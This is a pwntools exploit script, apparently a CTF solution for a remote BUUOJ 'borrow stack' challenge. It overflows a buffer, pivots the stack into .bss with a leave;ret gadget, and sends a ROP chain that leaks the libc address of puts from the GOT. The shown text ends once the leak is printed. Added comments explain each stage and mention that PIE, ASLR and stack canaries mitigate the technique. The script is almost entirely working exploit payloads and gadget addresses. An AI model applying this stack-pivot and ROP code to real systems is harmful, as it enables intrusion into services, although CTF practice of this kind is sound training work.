from pwn import *
from LibcSearcher import *  # not referenced in the visible lines of this script

# Connection: the local process() line is left commented out; the script
# talks to the remote service below.
#p=process('./pwn')
p=remote('node5.buuoj.cn',25450)
elf=ELF('./pwn')
context(log_level='debug')  # pwntools logs every byte sent and received
# Gadget and .bss addresses are hard-coded 0x40xxxx/0x60xxxx values, which
# presumes a non-PIE binary (inferred from the constants, not checkable
# here). Defender note: PIE/ASLR would invalidate these constants and a
# stack canary would catch the overflow in stage 1 before the saved frame
# is reused -- both are the standard mitigations for this class of bug.
leave_ret=0x400699          # per its name, a leave; ret gadget
pop_rdi=0x0000000000400703  # per its name, a pop rdi; ret gadget
bss=0x601080                # writable address the stack is pivoted to
ret=0x4004c9                # per its name, a plain ret (padding in payload2)
libc=ELF('./libc-2.23.so')
shell=0x4526a  # presumably a libc offset used later; not referenced in the visible lines
main = elf.sym["main"]
puts_plt= elf.plt["puts"]
puts_got = elf.got["puts"]
#gdb.attach(p) pause()

# Stage 1: 0x60 bytes of filler, then bss where the saved rbp is expected
# and leave_ret where the return address is expected, so the function's
# epilogue moves rsp to bss (stack pivot). The frame layout is assumed from
# the constants; the vulnerable read itself is not visible here.
payload=b'a'*0x60+p64(bss)+p64(leave_ret)
p.send(payload)
# Stage 2: 28 plain rets as a sled, then puts(puts_got) and a return to
# main -- i.e. print the GOT entry of puts to disclose a libc address.
# This assumes the program's next read lands at bss; not verifiable here.
payload2=p64(ret)*28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
p.send(payload2)
p.recvuntil(b'Done!You can check and use your borrow stack now!\n')
# NOTE(review): recv(6) may return fewer than 6 bytes on a short read, which
# would silently produce a wrong address; recvn(6) waits for exactly 6.
leak_addr = u64(p.recv(6)+b'\x00\x00')
print(hex(leak_addr))  # the leak is only printed here; later stages are outside this view